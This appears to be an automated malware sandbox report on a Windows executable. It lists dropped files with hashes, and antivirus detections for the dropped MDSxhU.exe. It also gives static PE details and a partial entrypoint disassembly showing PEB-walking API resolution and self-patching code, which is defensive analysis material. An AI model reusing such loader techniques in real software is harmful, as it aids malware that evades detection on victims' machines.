Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Jul 24 15:33:13 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	137560
Entropy (8bit):	1.8785319455263483
Encrypted:	false
SSDEEP:	384:szI/F7/tj418gLGpkz9fNMt+ZYmZbYbxDqu+GZ2XBSKpYslgW:szI/NVj4egLGpyZNMOpZbYbxDyGZqAr
MD5:	F7A3B42069A0354CC2904A9C93039E2D
SHA1:	E0D51F2A7C86277720A59F101F92F2CAE8B614F3
SHA-256:	113DE17932DEC37E2E4AEC292EC76BA034F4DB2F9D365A612C3C6DCE21533BC5
SHA-512:	20A181714ADA3378FB639C8D52D84EA14C5E0009E3D2B37D87AA3B8EFC7A9CB39B97764CDCCF364A2F6660D06984657438139AD1A6B3E177ED372A51F65547A5
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f............D...............L.......T...XQ..........T.......8...........T............P..H............#...........$..............................................................................eJ.......%......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6107.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8622
Entropy (8bit):	3.7246822043559886
Encrypted:	false
SSDEEP:	192:R6l7wVeJeln6S6TEb6YNvSU9QpgmfPqgeVnprx89bRysf47m:R6lXJs6VEb6YlSU9QpgmfCnVERxfZ
MD5:	3C89D4C036D281262F3EC4AA230DE555
SHA1:	C7A50ED29E69DD491CD3618B657A44074308E9F5
SHA-256:	7F3BDF5EAD8BB6FC0CB816300BF6F1E69E596A3E354D346676F05007A1747B75
SHA-512:	3897B488A4F4280D200AE89AE0668875C5E9C6EFAC5408EDC039A66C6CD1ED50BDE0F72F5553CA68DECE3A1CE720EB940772545B3B0150B31B6C8C661BF2C39B
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6202.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4937
Entropy (8bit):	4.647620554918031
Encrypted:	false
SSDEEP:	48:cvIwWl8zsIJg77aI9EC2WpW8VYHYm8M4J3N5htFB+q8h3SOGjC680j0yd:uIjfOI7aCX7VPJ3nzy3OjCJ0j0yd
MD5:	611A63BC300BD1E17C1E0A1E326552D1
SHA1:	FAAC00774F70F81C04AB32C60963A5FC8DEFCB83
SHA-256:	325539407F1070B3058C354921C6E33E67547ADBA631CE5677835D04C6963BF2
SHA-512:	739422C2F1556A20BCB422CBA0C4CF9F171614B28B449B56BF2CC647587A5753EEFA17A19B9DA79EB53FC88549EA25084BA1D9202B779FA0691ADCF08E3B0CD2
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425195" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER779C.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jul 24 15:33:20 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	144930
Entropy (8bit):	1.8107438977077048
Encrypted:	false
SSDEEP:	384:RPcg9tKAyzeHpVTuo2C0rc9gcXSfxdKUDrBRYs2yMJjrM9smiOc:RPcg9ANeHpVTuoPNzazKU5RYs2VrqR
MD5:	0844B96EC4CA1770391CDD933FEFAC17
SHA1:	B7A2F582883D25D91D2D110A6D71D17B1C360063
SHA-256:	7BA96F1E54A668B90700CD730E832703958D73B9CCCDC2E9575339D91A8CEED8
SHA-512:	8CD1A92430871921B5EA5ABEBB36E266068FC5DE8C3AA4EE992E00F5429F373A8B30241DF17EDA72F319BFACD68196504D6E4CA23E5A998C7B798096D079A172
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f............D...............X...........$ ..........\|O..........`.......8...........T...........H;.............. !...........#..............................................................................eJ.......#......GenuineIntel............T.......<......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7858.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8382
Entropy (8bit):	3.707392261294824
Encrypted:	false
SSDEEP:	192:R6l7wVeJN76izge6YelV6KiSUTgmfmp9pDG89bJlsfIDm:R6lXJR6+6Yu6wUTgmfmp3J+fB
MD5:	994B554F25E23DA2B803CB53B4C23168
SHA1:	1E02FDB595A439084F86217DE6BD9BC365EE1A90
SHA-256:	8E3C5BE85921862171B30FED8457B04EF1237D539439E5E9D5E5DBDADA85A178
SHA-512:	CF3DABD87DC670F89297A7088D5C0CF87C8BF58C8C7C9D886F29A26B913FF31042C8F8E2FFB4CC301516E92D38D70000934223D453CBB188324860986FF25D78
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7878.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.460312060209717
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZJg77aI9EC2WpW8VYpYm8M4JwOFvG+q8G5tAguYd:uIjfrI7aCX7VNJVGttAguYd
MD5:	B720FAD4C724AD81D7795468EF035A65
SHA1:	544CF20E1CF6BEBEBF26ACE17732E5ECFA9FE654
SHA-256:	932D181A012ADD2A8DEAE2C2A3404C0705C69244A4E425ECBD5CC26369A9BE7D
SHA-512:	5F312D9FAD04CF16D30E53C56D85FC083E30ACB73520BA665A9DE88FE2E8B61F198A1620BE864BAEC6791FC9F525F1CD139CFB0A3133D40659938EA09E54062E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425196" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k2[1].rar

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k3[1].rar

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k4[1].rar

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k5[1].rar

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\04353B1A.exe

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\435F2219.exe

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\43CF067D.exe

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\7B0168D0.exe

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\7DE67403.exe

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Process:	C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: 63D7B37217BAD05463192BD2F5E39A4AC23FF21C52CD27BF541780D29CF77C7F.exe, Detection: malicious, Browse Filename: 641ce2409374cfc1d1e5ffcb68c0f53239453da0a60bc6021a228d5c0eed5204.exe, Detection: malicious, Browse Filename: 62e622661a968df60428fb599c2008c35b47079cf1d9cd8be611f671a9b21f4c.exe, Detection: malicious, Browse Filename: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, Detection: malicious, Browse Filename: 5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exe, Detection: malicious, Browse Filename: 5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exe, Detection: malicious, Browse Filename: 58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exe, Detection: malicious, Browse Filename: 5673773206126F12F4692E91C084B927357D9CF5FA3D5C312D89C9942B5C90FE.exe, Detection: malicious, Browse Filename: 56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exe, Detection: malicious, Browse Filename: 54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Process:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.420535970056118
Encrypted:	false
SSDEEP:	6144:lcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNi5+:Ci58oSWIZBk2MM6AFBAo
MD5:	755FEE7C4E13437E02CFE2DB61DD0375
SHA1:	DFCB2354AE1FC425292B2D1DDE48DEFC738FA6B3
SHA-256:	E258C34736098DEA59726B404ED3399A97701ADDCEBB7D9C05E465B5AC352890
SHA-512:	33CAD4A3EA2DA216EE874FC9FC29EBFA07CC4AEFCCB2AAA18C217268E62F97D91CFC6B6CA8B2EED7EA7A963304D94391C9329F79544B282403934B8B50634FF7
Malicious:	false
Preview:	regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm**V.................................................................................................................................................................................................................................................................................................................................................R=@.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.395294234307551
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
File size:	1'803'264 bytes
MD5:	7bb46178f57f6ea01347b1790d7bfa27
SHA1:	bad79fb2e79f12feabd5249636537842e45b9bef
SHA256:	ded8995ef3dc7ea298fa16e1733b033e06261a76e1639430d4808600884c7467
SHA512:	86ea26f7f142020e1738de929b6de90400cfa7a1e7b8f69aa62c46b98c220e8f9966eb319bae04fef5c23cea21935d4f10c944e16e4bce4e2e47e5d7c30d9da5
SSDEEP:	24576:DKAgpBGV2HpWHuREjDnI2AuADZ8KvqC75H2dtDPc/ExKFY/fwg:vgpG57R8InDPcsxKC/fwg
TLSH:	5A858F03E24261B6D8E6417385BE46BE8C246D35235C60DFB3847E6A65714F33B36E2B
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........@...............-.......+.w.....+..............-.......&..............(......./......./.7.....*.......+....................

File Icon


Icon Hash:	1cb3716727070706

Static PE Info

General

Entrypoint:	0x5be000
Entrypoint Section:	=Jcu
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x623D6344 [Fri Mar 25 06:37:56 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d69e4c13e25f0ad622344ac56118c0df

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 7853444Dh
mov dword ptr [ebp-44h], 652E5568h
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007F317895FF15h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFF27CB2h
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007F317896005Eh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007F317895FF64h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007F317895FF5Bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14455c	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14f000	0x65768	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1b5000	0x80d4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x13d8d0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x13da00	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x13d908	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11a000	0x30c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x112351	0x112400	260b90c2cc239bb9a96cb68acd909348	False	0.5049807358135825	data	6.558377237006261	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.ottwaed	0x114000	0x575a	0x5800	7099e3d65d80971808525f8cf6c161ae	False	0.4733664772727273	data	6.013704941772504	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x11a000	0x2b71a	0x2b800	e964960a2a657bc42f743bd61cfde340	False	0.4491401760057471	data	5.821571252633695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x146000	0x77e4	0x2e00	e1a3020d65f0d98b42aa980307bd5ceb	False	0.2523777173913043	PGP symmetric key encrypted data - Plaintext or unencrypted data	3.8961145936273938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ottwaed	0x14e000	0x50	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x14f000	0x65768	0x65800	ae79857cac56a3cd040cc978ddcc2a41	False	0.24274553571428573	data	4.457508526027022	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
